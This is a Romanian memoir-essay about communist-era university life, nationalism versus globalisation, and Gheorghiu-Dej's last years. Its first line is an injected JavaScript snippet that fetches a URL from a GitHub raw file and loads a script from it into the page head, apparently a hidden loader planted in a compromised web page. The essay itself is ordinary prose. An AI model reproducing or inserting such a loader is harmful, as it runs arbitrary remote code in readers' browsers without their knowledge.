;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Ce mă nedumereşte uneori cumplit este duritatea cu care diverşi adepţi ai mondializării o susţin frenetic, deşi ideea, neverificată pe deplin în timp –, cândva impusă şi invers, cu acelaşi zel, de părinţii lor, în favoarea internaţionalismului proletar, s-a dovedit funerară. Desigur, nu-i obligatoriu ca odraslele să preia biblic şi convingerile taţilor sau strămoşilor din care se trag. Pe unul din generaţia mea l-am avut profesor de marxism la facultate, notat în carnetul meu de student cu 9, spre deosebire de colegul Mircea Dănciulescu, iniţial absolvent la „Sorbona“ – cum îi ziceam noi facultăţii de trei ani pentru învăţători – continuată de el cu alţi doi de cursuri filologice, ca să obţină o diplomă universitară.
Frumuşel şi extravagant, îi spun înaintea unei examinări orale, în faţa sălii unde urma să tragem bileţelul cu trei subiecte:
– Amice, ai dat de dracu cu Radu Florian, când te-o vedea înţolit după ultimul jurnal, papiţoi ideologic de rasă pură.
– Adică?
– Adicătelea dandy la vestimentaţie, ca să nu zic occidentală, victimă burghezo-moşierească, după colonia ce-o emani, că nu pute a parfum rusesc, vândut cu chila la tutungerii.
N-au trebuit explicaţii suplimentare, fiindcă a dispărut ca la comandă, s-apară într-o blană lăţoasă, puturoasă foc – cum poartă vara ciobanii la stână –, luată de la un ins de pe culoarele universităţii. Neînţelegând nimic din întrebările de pe biletul examinării, când i-a venit rândul să răspundă, avea să miorlăie supus:
– Tovarăşe profesor, eu cu teoria o duc mai rău, că – vorba ceea – practica ne omoară, dar mă laud că-n două sate, unde am fost repartizat ca învăţător, am format două gospodării colective, mergând din casă în casă şi vorbind cu ţăranii, de unde, nu o dată, am plecat şi bătut. Aşa că seara, la lampa de gaz şi cu grija lecţiilor de dimineaţă, greu la deal cu boii mici.
Bietul Florian, ca să scape de putoarea ce-o răspândea blana studentului, s-o care ş-acasă, i-a dat nota 5, scăpând unul de altul, nu şi gândacii din locuinţele lor.
Mereu pe lumină, pentru că niciodată aprigul constructor al transformării socialiste a agriculturii nu l-a avut de client – fiind un umil responsabil de cinematograf mărginaş şi, mult mai târziu, secretar de redacţie la „Revista Bibliotecarilor“. În facultate, „tufă de Veneţia“, împuşca un 5 la toate examenele, suduind pe dascălii ce făceau imprudenţa să-i dea peste minima de trecere. Nu-i ocăra degeaba:
– Cine credeţi, deştepţilor, că peste ani îşi v-aduce aminte careva că-ntr-o vreme nota 5 ţinea loc de 10? S-a găsit profa de rusă, cu literele ei încârligate – imposibil de citit şi de-a-ndoaselea –, să-mi dea 6, după ce naiba m-a pus s-o complimentez că tot ce ştiu din limba lui Puşkin este Ia liubliu tebia, pe româneşte „te iubesc“, cu palma în dreptul inimii. Altminteri, nimic de reproşat – fată de nota 10 – n-o fi auzit demult o declaraţie de amor, că şi vorbele dragostei de început se tocesc (N.B. personaj hazos, pe care ca autor nu-l puteam ignora, aşa că l-am distribuit în fresca „Arta de a fi păgubaş“, cu amintiri de acelaşi gen.)
De mişcat, totul se mişcă în jurul nostru. Odată cu vârsta, se schimbă şi aşezările, oamenii, ba şi legislaţia –, iar de cromatica lor politică, să nu vorbim; ieri, din tată-n fiu, rudă cu papa Marx, – nu cu Plăpumaru din 1921 –, azi concurând cu spectrul curcubeului –, aşa că nu ştii niciodată unde dai şi unde crapă!
De mult programele de stânga, de dreapta, de centru sau răsucite nu mai au valoare, de când un salam, un cârnat şi doi mici, o halbă, două ş-un sutic par să sfideze cele mai elementare norme ale democraţiei, ca „domnie a poporului“.
Ca mulţi alţii, dreptul la replică l-am înţeles de mult, privind fundarea justiţiei de către romani, cu acel principiu obligatoriu de a asculta şi cealaltă parte a unui conflict, la nevoie şi confruntarea cu alţi martori, în stare să elucideze adevărul-adevărat, nu fardat, delict penal, în virtutea „libertăţii de expresie“.
Se uită mult prea uşor că libertatea este deplină în măsura în care nu lezează libertatea celui de alături, dacă ambii nu-s certaţi cu legea.
În virtutea cărei legiuiri, cuvinte sacre din istoria unor popoare – aflate cândva sub călcâiul unor stăpânitori străini –, precum neam, naţie, patrie, patriotism, unire, autonomie, stăpânire totală pe bogăţiile ţării şi tot ce ţine de statutul de membră a unei uniuni teritoriale, au devenit peiorative?
– Ca-n SUA – îmi zice un vorbăreţ, altminteri de bună credinţă –; spui american şi gata, nu eşti obligat să-i zici, „neamţ, german sau teutonic“, să-i defineşti naţia, cu 50 de state în componenţa lor.
– Ce spui, Frantz? Uiţi că vorbeşti de o democraţie cu veche tradiţie, în care un preşedinte ca Bill Clinton a fost scuturat public, să-i cadă şi plombele din gură, până când bluza unei funcţionare de la Preşedinţie, Monica Lewinsky – păstrată ca amintire – l-a obligat să constate că în Biroul Oval fumul unui trabuc de soi lasă urme mai aparte. Compari un elefant c-o vietate din regnuri diferite, ce-n bătrâna Europă se zbate să-şi găsească locul, cu istorii deosebite, – mai ieri pierzătoare, azi câştigătoare (sau invers), în funcţie de starea lor economică (de aici şi propunerea unor forţe dominante de a adopta măsuri pentru o „Uniune cu două viteze“). Iar noi, ţară frumoasă, cu relief bogat, şes roditor, cu râuri, ape minerale, munţi, păduri şi mare, ţară destinată turismului, cândva grânar al Europei, cu subsol aurifer şi metale rare, minereuri şi gaze naturale – în stare să înzestreze industrii adecvate solului, – s-ajungem în sapă de lemn?! De râsul lumii, ţară la cheremul băncilor străine, cu eterne împrumuturi, ca să putem achita dobânzi la dobânzi, milogi ca nivel de viaţă, dar aliniaţi la preţuri mari şi distanţaţi ca ciumaţii la venituri, urmare a multor privatizări frauduloase şi dezechilibrării balanţei dintre import şi export. „Democraţie originală“, cu o politică economică falimentară – slugi la stăpâni, de aproape sau de departe –, cu peste patru milioane de români plecaţi peste hotare şi cu o masă de sărmani sub nivelul asprei sărăcii. Involuntar implicaţi când ţii seama de situaţia prosperă a statelor americane, unde libera concurenţă domneşte, niciodată în favoarea unei ţări sau alteia.
– Şi unde nici vorbă de naţionalism, la ei politica rasială dând de furcă poliţiei federale.
– Să nu încurcăm lucrurile, pentru că de la naşterea statului american diferenţierea naţională nu s-a pus, la noi şi la alţii stările fiind totalmente diferite. Despre ce naţionalism vorbim, când stindardul ideii n-a fost şi nu este acelaşi?! Pe zi ce trece, în mintea unora e un ideal care şi-a trăit traiul şi şi-a mâncat mălaiul. Ba mai mult, în urechile lor ar fi sinonim cu „otravă“. Ca şi cum niciodată n-ar fi avut şi valoarea de „eliberator“. Născut într-un Bucureşti, redus ca dimensiune, pe o ramificaţie a Căii Moşilor – ce lega Oborul mărginaş cu centrul Capitalei – trăiam ca la Organizaţia Naţiunilor Unite, mai ales copiii, odrasle de români, evrei, armeni, greci şi albanezi, strigându-ne între noi şi pe naţii, cu cea mai pură intenţie apelativă. Ne bucuram de sărbătorile religioase şi istorice, precum crearea statului Israel, când, în 1948, datorită luptei sioniste, evreii şi-au dobândit independenţa. Credinţa naţionalistă le-a înflăcărat spiritul, unirea lor meritând, ca şi în cazul ţărilor despovărate de colonialism, să fie înţeleasă corect. Pentru abnegaţia de a-şi apăra demnitatea şi unitatea sunt de invidiat.
Precizarea e utilă, fiindcă adesea staulul e confundat cu cocina de porci, doar după numele comun al aşezării lor. Puţini, prea puţini ştiu că „anii de dezgheţ“ – cum se mai zice scurtei perioade de trăire suportabilă – au fost patronaţi – incredibil – de Gheorghe Gheorghiu-Dej, afirmaţie ce va impune dezvăluiri aparte. După demascarea crimelor staliniste de către Hruşciov – în plenara de pomină, la care au fost convocaţi în capitala moscovită toţi conducătorii partidelor „frăţeşti“ – urmată cu modificări în viaţa interioară a sistemului comunist –, era de aşteptat ca primul condamnat la pieire să fie el, dovedit a fi fost, îndeosebi spre sfârşitul domniei, cea mai docilă slugă a Tătucului, dispusă să execute orice i s-a cerut, pusă cândva să prezinte şi rezoluţia Biroului Informativ împotriva „călăului Tito“. Vulpe şireată, izbutise să lichideze şi cuibul de năpârci, consecvente şi teritorial împotriva românilor – dovedibil şi azi, nominal, prin politica de cadre dusă după venirea lor la putere, ulterioară „eliberării“ din 23 august 1944. Să nu se înţeleagă că Dej ar fi acţionat sub impulsul unor sentimente naţionale, atâta timp cât, cu ajutorul altei lichele, Alexandru Drăghici, şi-a mânjit mâinile până la coate cu sângele lui Lucreţiu Pătrăşcanu, vechi militant de stânga, arestat şi bătut cu sălbăticie până la cangrenă, să recunoască neadevărul c-ar fi agent englez. Motivul? Un minim bun-simţ l-ar fi îndemnat ca, întors de la Moscova, să-i cedeze conducerea partidului.
Aşa se face că aflând târzior de mai noile mişculaţii moscovite, turbat că fusese radiat tocmai de iubiţii confraţi de la Răsărit, a vrut să moară ca mare patriot şi să întoarcă roata istoriei, o imposibilitate. Despre evoluţia unor măsuri de relativă liberalizare ştiam din surse credibile, că nici membri ai Comitetului Executiv nu-şi explicau dacă decizia „fratelui mai mare“ se explica prin unele hotărâri naţionale, ori, dimpotrivă, consecinţa unor presiuni ale unor confraţi externi (nu se poate uita că dacă sovieticii s-au spălat pe mâini de condamnarea lui Pătrăşcanu, considerat „naţionalist“), ori a partenerilor internaţionalişti din afară, de mare influenţă (altminteri nu putem înţelege de ce un Vasile Luca şi alţii putrezeau în închisori – cu uşi indiferente la naţia condamnaţilor –, iar Ana Pauker, bolşevică de marcă, acuzată cu aceeaşi asprime, lăsată la casa ei, figurând pe statul de plată al Editurii Politice, cu iniţialele A.P.).
Că era bolnav grav, Dej ştia mai de mult. Aflasem, ca mare secret, de la acad. Teodor Burghelea, într-o discuţie cu prof. Vivi Neagu – ce avea să-l înlocuiască la conducerea spitalului Panduri. Ne spunea că Şeful îl chemase să-i mulţumească pentru serviciile medicale anterioare, datorită cărora trăieşte. (Am tăcut şi-mi văd de treabă.)
Îl citez pe chirurg: „Poate că în sinea lui spera să mă ofer să-l operez din nou, ceea ce ar fi fost o nebunie, fiindcă după câteva luni, maximum şase, înflorea cancerul şi-n groapă“.
Cred că discuţia a fost prin toamna anului 1964, când va fi aflat de iradierea ce-i provocase cancerul pulmonar, după măsurile luate în acelaşi an, de ochii românilor şi străinătăţii – precum decretul de eliberare a deţinuţilor politici, schimbări în structurile de stat şi de partid când membrii Biroului Politic îi ascultau dispoziţiile, fără să le şi execute („Tu te descotoroseşti de ruşi, dar ne laşi cu ei în spinare“), aşa că mai tot ce a izbutit să realizeze prin Ceauşescu – şeful secţiei organizatorice – care cumula răspunderi operative de mare importanţă, precum cadre, viaţa de partid, resorturi speciale militare – activist ce nu făcea parte din Biroul Politic –, a putut să iniţieze, paradoxal, „anii de dezgheţ“, înainte de a-l trezi pe patriarhul Iustinian Marina – iniţial popă de mir din Episcopia Râmnicului – să-şi pună un patrafir peste cămaşa de noapte şi potcapul pe cap, s-alerge să se spovedească la cerere.